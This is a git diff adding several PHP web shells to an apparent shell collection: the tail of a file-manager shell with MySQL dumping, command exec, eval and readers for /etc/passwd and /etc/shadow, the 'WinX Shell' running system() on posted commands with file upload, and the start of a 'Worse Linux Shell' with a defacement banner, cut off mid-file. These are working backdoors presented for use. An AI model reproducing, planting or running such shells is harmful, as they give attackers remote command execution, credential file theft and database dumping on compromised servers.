+$n='.gz';
+gzclose($fp);
+break;
+case 2:
+$n='.bz2';
+bzclose($fp);
+break;}
+head($tmpfname,$_POST['table_sel'].$n);}
+break;
+case 1:
+$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect); 
+if(mysql_num_rows($res) > 0) {
+while($row = mysql_fetch_assoc($res)) { 
+$values = array_values($row); 
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode($_POST['cvs_term'], $values); 
+write($values);}}
+break;}}
+echo "$text\n<table height=200 width=100%><tr><td bgcolor=green width=10%>";
+$db_list=mysql_list_dbs($connect);
+echo "<select name='db' multiple size=30>\n";
+while($row=mysql_fetch_object($db_list)){
+$db1=$row->Database;
+echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>\n";}
+echo "</select></td><td bgcolor=#CBC3B6>\n";
+if(!empty($_POST['db'])){
+$tb_list=mysql_list_tables($_POST['db']);
+echo "<select name='table_sel' multiple size=30>";
+for($i=0;$i<mysql_num_rows($tb_list);$i++){
+$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i)));
+echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";}
+echo "</select></td><td width=100%>
+<table  width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>\n";
+if(isset($_POST['table_sel'])){
+$c=array('Browse','SQL','Insert','Export');$i=-1;
+while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}}
+echo "&nbsp;&nbsp;<b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>\n";}
+if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0;
+elseif(isset($_POST['push']))$_POST['go']=1;
+if(isset($_POST['back']))$_POST['go']=3;
+if(isset($_POST['brow']))$_POST['go']=0;
+if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4;
+if(isset($_POST['ed_save']))$_POST['go']=5;
+if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0;
+if(isset($_POST['go'])){switch($_POST['go']){
+case 0:
+if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){
+$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql'])));
+$result=mysql_query($_POST['querysql'],$connect);}
+else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort='';
+if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20';
+if(isset($_POST['br_st']) && isset($_POST['br_en'])){
+$co=$_POST['br_en'].','.$_POST['br_st'];}
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);}
+for($i=0;$i<mysql_num_fields($result);$i++){
+if(ereg('primary_key',mysql_field_flags($result, $i)))
+$prim=mysql_field_name($result, $i);}
+$up_e='';
+echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>\n";
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>\n";
+if(!isset($lk)){
+echo "<td><b>EDIT</b></td>";
+foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");}}
+if(!isset($prim)){
+while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
+$up_e=substr($up_e,0,-5);}
+else{while(list($key,$val)=each($line)){
+if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}}
+$up_e=urlencode($up_e);
+echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>\n";
+$up_e='';
+foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";}
+echo "</tr>\n";}
+echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by
+<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'>
+Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
+<input type=submit name=editr value=Edit>";
+mysql_free_result($result);
+break;
+case 1:
+echo "<input type=submit name=push value=Run><br>
+<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
+if(!empty($_POST['querysql'])){
+$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";}
+break;
+case 2:
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";
+$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
+for($i=0;$i<mysql_num_fields($fields);$i++){
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
+echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
+break;
+case 3:
+if(!isset($_POST['back']))echo '<table height=250  align="center"><TR><TD>
+<table height=100%>
+<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr>
+<tr><td height=100%></td></tr>
+</table></TD><td>
+<table width="140" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>CSV</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR>
+<tr><td height=100%></tb></tr>
+</table>
+</td><td>
+<table height=100%>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
+<tr><td height=100%></td></tr>
+</table></td><td>
+<table width="120" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'.
+((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':'').
+((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR>
+<tr><td height=100%></td></tr>':'').'</table></td></TR>
+<tr><td><input type=submit value=backup name=back></td></tr>
+</table>';
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}}
+break;
+case 4:
+if(isset($_POST['edit'])){
+$up_e=$_POST['edit'];
+echo "<input type=hidden name=edit value='$up_e'>";
+$up_e=urldecode($_POST['edit']);
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";$fi=0;
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){
+foreach($line as $key=>$col_value) {
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
+$fi++;}}
+echo "</table></div><input type=submit name=ed_save value=Save>";}
+break;
+case 5:
+$ted='';
+$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
+while(list($key1,$val1)=each($_POST2)){
+if(preg_match('/ed_key:(.+)/',$key1,$m))
+{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}}
+$ted=substr($ted,0,-2);
+$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
+echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
+$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
+break;}}
+echo "</td></tr></table></td></tr></table><input type=hidden name=sql>\n";}
+else echo $text;
+echo "</form></body>";exit;}
+echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>\n";
+if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>'));
+if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>'));
+if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>'));
+if(!empty($_POST['th']))@chdir($_POST['th']);
+echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE"));
+#UP
+if(isset($_POST['up']))@chdir('../');
+#CD
+if(isset($_POST['c']) && $_POST['cd']!=''){
+if(!test_file($_POST['cd'])){
+if(is_dir($_POST['cd'])){
+@chdir($_POST['cd']);
+}
+else $error=font('red',e(3));
+}
+else $error=test_file($_POST['cd']);}
+echo w(3)."<input type=text size=60 value=".getcwd().">";
+echo font('blue','USER : '.get_current_user());
+if(file_exists("/"))
+echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ'));
+if(file_exists("C:/"))
+echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ'));
+if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE');
+echo "<br>";
+?>
+<hr>
+<form method=POST name=main>
+<input type="submit" value="^" name="up">
+<input type=text name=cd>
+<input type=submit value=cd name=c>
+<input type=text name=open>
+<input type=submit value=open name=op>
+<input type=text name=new>
+<input type=submit name=cr value="new file">
+<input type=text name=exec>
+<input type=submit name=exe value=exec>
+<input type=submit name=info value=phpinfo>
+<br>
+<?php
+$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf');
+echo '<select name=passwd>';
+foreach($ar_file as $ar_l){
+if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>\n";}
+echo '</select><input type=submit name=passw value="read file">';
+?>
+<input type=submit name=menu value=upload>
+<input type=text name=downf>
+<input type=submit name=downl value=download>
+<input type=text name="test">
+<input type=submit name=tes value="perms">
+<input type="submit" name="sql" value="mysql">
+<input type="submit" name="eval" value="eval">
+<br>
+<input type=text name=strin>
+<input type=text name=remot>
+<input type=submit name=copy value=copy>
+<input type="text" name="renold" >
+<input type="text" name="rennew" >
+<input type="submit" name="rename" value="rename">
+<input type=text name=rm >
+<input type=submit name=del value=del>
+<br>
+<input type=reset value=RESET>
+<input type="text" name="mkdir">
+<input type="submit" name="mk" value="mkdir">
+<input type="text" name="rmdir">
+<input type="submit" name="rmd" value="rmdir">
+<input type="text" name="ch_mod">
+<?php
+for($bch=1;$bch<=3;$bch++){echo"<select name=ch_p$bch>\n";
+for($ach=7;$ach>=0;$ach--){echo"<OPTION value=$ach>$ach</OPTION>";}
+echo"</select>";}
+?>
+<input type="submit" name="ch_chmod" value="chmod">
+<input type=submit name=find value='find writeable'>
+<br>
+<hr>
+<?php
+#FIND WRITEABLE##############
+if(isset($_POST['find'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');}
+if(isset($_POST['fww']) && !empty($_POST['fpath'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>');
+$arrfw=array($_POST['fpath']);
+$ife=0;
+while(++$ife<=count($arrfw)){
+$pathfw=$arrfw[$ife-1];
+if(is_readable($pathfw)){
+if($hfw=opendir($pathfw)){
+while(false!==($ffw=readdir($hfw))){
+$ffw=$pathfw.$ffw;
+if(!preg_match('/\/\.+$/',$ffw)){
+if(is_dir($ffw)){array_push($arrfw,$ffw.'/');}
+print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}}
+closedir($hfw);}}}}
+
+
+if(isset($_POST['eval'])){
+echo "<textarea cols=70 rows=7 name='ev'></textarea>\n";
+
+
+
+
+
+echo "";
+}
+############################################################################
+#RENAME
+if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){
+if(file_exists($_POST['renold'])){
+@rename($_POST['renold'],$_POST['rennew']);
+}
+else $error=font('red',e(0));
+}
+#
+
+#RMDIR
+if(isset($_POST['rmd']) && isset($_POST['rmdir'])){
+if(file_exists($_POST['rmdir'])){
+if(is_dir($_POST['rmdir'])){
+if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet"); 
+else $error=font('red','dir not deleted');
+}
+else $error=font('red',e(3));
+}
+else $error=font('red',e(0));
+}
+#
+#CHMOD
+if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){
+if(file_exists($_POST['ch_mod'])){
+@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));}
+else $error=font('red',e(0));}
+#
+#DELETE
+if(isset($_POST['del']) && $_POST['rm']!=''){
+if(file_exists($_POST['rm'])){
+if(!is_dir($_POST['rm'])){
+@unlink($_POST['rm']);
+}
+else echo "<br>".font('red',e(4)."<br>");
+}
+else echo "<br>".font('red',e(0)."<br>");
+}
+#
+#EXEC
+if(!empty($_POST['exe'])){
+if(@exec($_POST['exec'],$ar)){
+echo "<textarea cols=70 rows=15>";
+foreach($ar as $line){
+echo $line."\n";
+}
+echo "</textarea>";}}
+#
+#OPEN FILE
+if(isset($_POST['op']) && $_POST['open']!=''){
+if(!test_file($_POST['open'])){
+if(!is_dir($_POST['open'])){
+$fil=file($_POST['open']);
+echo "<textarea cols=100 rows=20 name=edit>";
+foreach($fil as $vv){
+echo htmlspecialchars($vv);
+}
+echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3);
+if(is_writable($_POST['open'])==1){
+echo w(2).font('green','ACCESS GRANTED');
+echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>";
+}}
+else $error=font('red',e(2));
+}
+else $error=test_file($_POST['open']);
+}
+if(isset($_POST['save'])){
+$fr=fopen($_POST['sv'],"w");
+$out=$_POST['edit'];
+fputs($fr,$out);
+fclose($fr);
+}
+#
+#CREATE FILE
+if(isset($_POST['cr']) && $_POST['new']!=''){
+if(is_writable(dirname($_POST['new']))){
+echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea>
+<input type=submit name=cre value=create>
+<input type=hidden value=".$_POST['new']."  name=nf>";
+}
+else echo "<br>".font('red',e(2)."<br>");
+}
+if(isset($_POST['cre'])){
+$ee=fopen($_POST['nf'],'w+');
+$out=$_POST['newf'];
+fputs($ee,$out);
+fclose($ee);
+}
+#
+#MKDIR
+if(isset($_POST['mk']) && $_POST['mkdir']!=''){
+if(is_writeable('./')){
+@mkdir($_POST['mkdir']);
+echo font('green',"dir ".b($_POST['mkdir'])." create"); 
+}
+else echo font('red',e(2));
+}
+#
+echo "<input type=hidden name=th value=".getcwd()."></form>";
+#UPLOAD FILE
+if(isset($_POST['menu']) || isset($_POST['qq'])){
+echo "
+<form enctype=multipart/form-data  method=post>
+Save as :<input type=text name=name>File :<input name=userfile type=file>
+<input type=submit value=Send name=go_up>
+<input type=hidden name=qq>
+<input type=hidden name=th value=".getcwd()."></form>";
+if(isset($_POST['go_up'])){
+if(isset($_POST['name']) && $_POST['name']==''){
+$_POST['name']=$_FILES['userfile']['name'];}
+if(!preg_match('/^\//',$_POST['name'])){
+$_POST['name']=$_POST['th'].'/'.$_POST['name'];}
+if(is_uploaded_file($_FILES['userfile']['tmp_name'])){
+@copy($_FILES['userfile']['tmp_name'],$_POST['name']);}
+else echo "<br>".font('red',"Permisions denied");}}
+#
+#TEST PERM
+if(isset($_POST['tes']) && $_POST['test']!=''){
+$j=$_POST['test'];
+if(file_exists($j)){
+$w='';
+if(is_writeable($j)){
+$w=w(1).'WRITE'.w(1);
+}
+if(is_readable($j)){
+$w=$w.w(1).'READ'.w(1);
+}
+echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777));
+}
+else echo font('red',$e(0));
+}
+#
+#COPY
+if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){
+if(file_exists(dirname($_POST['remot']))){
+if(file_exists($_POST['strin'])){
+if(is_writable(dirname($_POST['remot']))){
+if(is_readable($_POST['strin'])){
+@copy($_POST['strin'],$_POST['remot']);
+}
+else echo font('red',"no read string file");
+}
+else echo font('red',"no write dest directory");
+}
+else echo font('red',"no such file");
+}
+else echo font('red',"no such dest dir");
+}
+#
+#CHECK DISK
+if(isset($_POST['free']) && $_POST['dirfree']!=''){
+if(file_exists($_POST['dirfree'])){
+$fre=@disk_free_space($_POST['dirfree'])/1048576;
+echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb");
+$fre1=@disk_total_space($_POST['dirfree'])/1048576;
+echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb");
+}
+else echo font('red',"No such disk");
+}
+#
+(isset($_POST['info']))?phpinfo():null;
+#
+#PASSWD
+if(!empty($_POST['passwd']) && isset($_POST['passw'])){
+echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>\n";
+foreach(@file($_POST['passwd']) as $fed)echo $fed;
+echo "</textarea><br>\n";}
+#
+if(isset($error))echo $error;?>
+<hr><?php
+##################################################################################
+if(is_readable(getcwd())){
+if($h=opendir(getcwd())){
+$arr=array();
+while(false!==($f=readdir($h))){array_push ($arr,$f);}
+closedir($h);}}
+else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>");
+sort($arr);
+echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>';
+foreach($arr as $f){
+$l=@lstat($f);
+print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):"")));
+$r=sprintf("%o",(@fileperms($f)) & 0777);
+$ow=posix_getpwuid($l[4]);
+$gr=posix_getgrgid($l[5]);
+$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));
+if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12);
+echo "</td><td>$r</td><td>$fow</td>";
+if(!is_dir($f)){
+if(!is_link($f)){
+echo w(2)."<td><i>".$l[7]."</i></td>";}
+else echo "</td><td>link</td>";}
+else echo "</td><td>DIR</td>";
+$fi=htmlspecialchars($f);
+echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>\n";}
+?>
+</table></body></html>
+<?php exit; ?>
diff --git a/php/WinX Shell.php b/php/WinX Shell.php
new file mode 100644
index 0000000..9957c9f
--- /dev/null
+++ b/php/WinX Shell.php	
@@ -0,0 +1,103 @@
+<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
+<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
+<?php
+
+// -----:[ Start infomation ]:-----
+// It's simple shell for all Win OS.
+// Created by greenwood from n57
+//
+// ------:[ End infomation]:-------
+
+
+set_magic_quotes_runtime(0);
+//*Variables*
+
+//-------------------------------
+
+$veros = `ver`;
+$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
+$windir = `echo %windir%`;
+
+
+//------------------------------
+   if( $cmd == "" ) {
+    $cmd = 'dir /OG /X';
+  }
+//-------------------------------
+
+
+//------------------------------
+
+print "<table  style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\"  border=\"0\" cellspacing=\"1\" cellpadding=\"2\"  >";
+print    "<tr>";
+print      "<td><font color=\"#990000\">You:</font></td>" ;
+print      "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
+print    "</tr>";
+print    "<tr>";
+print      "<td><font color=\"red\">Version OS:</font></td>" ;
+print      "<td><font color=\"#0066CC\"> $veros </font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Server:</font></td>";
+print      "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Win Dir:</font></td>";
+print      "<td><font color=\"#0066CC\"> $windir </font></td>";
+print    "</tr>";
+print  "</table>";
+print  "<br>";
+
+//------- [netstat -an] and [ipconfig] and [tasklist] ------------
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
+print "</form>";
+//-------------------------------
+
+
+//-------------------------------
+
+print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
+       system($cmd);
+print "</textarea>";
+print "<br>";
+
+//-------------------------------
+
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
+print "<br>";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
+print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
+print "</form>";
+
+//-------------------------------
+
+print "<form  enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
+print "<br>";
+print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
+print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
+print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
+print"</form>";
+
+?>
+
+
+<?
+
+// Script for uploading
+ if (is_uploaded_file($userfile)) {
+move_uploaded_file($userfile, $serverfile);
+}
+
+?>
+
+
+<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
+</body></html>
\ No newline at end of file
diff --git a/php/Worse Linux Shell.php b/php/Worse Linux Shell.php
new file mode 100644
index 0000000..0de1696
--- /dev/null
+++ b/php/Worse Linux Shell.php	
@@ -0,0 +1,69 @@
+<?php
+
+set_magic_quotes_runtime(0);
+
+print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
+print "<center><h1>#worst @dal.net</h1></center>";
+print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
+print "<center><h1>Watch Your system Shany was here.</h1></center>";
+print "<center><h1>Linux Shells</h1></center>";
+print "<hr><hr>";
+
+$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName  = `uname -a`;
+$SCWD   = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+    $currentWD = $SCWD;
+}
+
+print "<table>";
+print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
+print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
+print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
+print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
+print "</table>";
+
+print "<hr><hr>";
+
+if( $_POST['_act'] == "List files!" ) {
+    $currentCMD = "ls -la";
+}
+
+print "<form method=post enctype=\"multipart/form-data\"><table>";
+
+print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
+print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
+
+print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
+print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
+
+print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
+print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
+
+print "</table></form><hr><hr>";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+        print "<center><b>Error while uploading file!</b></center>";
+    } else {
+        print "<center><pre>";
+        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        print "</pre><b>File uploaded successfully!</b></center>";
+    }    
+} else {
+    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
